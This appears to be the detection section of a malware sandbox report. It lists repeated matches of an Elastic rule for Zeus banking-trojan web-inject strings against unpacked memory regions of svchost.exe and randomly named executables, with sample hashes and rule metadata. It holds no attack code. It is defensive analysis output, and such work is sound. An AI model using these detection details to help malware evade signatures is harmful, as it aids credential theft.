Source: 2.3.svchost.exe.37f0000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nFjEHtbDTFjy.exe.2562000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nFjEHtbDTFjy.exe.2b00000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.883000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.nFjEHtbDTFjy.exe.2ae0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nFjEHtbDTFjy.exe.2b00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.nFjEHtbDTFjy.exe.2a82000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.nFjEHtbDTFjy.exe.2d92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2bb0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.nFjEHtbDTFjy.exe.29f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.840698.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.883000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nFjEHtbDTFjy.exe.14d0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nFjEHtbDTFjy.exe.27f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2a56c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nFjEHtbDTFjy.exe.3042000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.nFjEHtbDTFjy.exe.20f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.nFjEHtbDTFjy.exe.2ae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nFjEHtbDTFjy.exe.1472000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.nFjEHtbDTFjy.exe.2f20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.nFjEHtbDTFjy.exe.28f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.nFjEHtbDTFjy.exe.2172000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2be2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nFjEHtbDTFjy.exe.690000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.nFjEHtbDTFjy.exe.2ef0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nFjEHtbDTFjy.exe.32f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.888400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
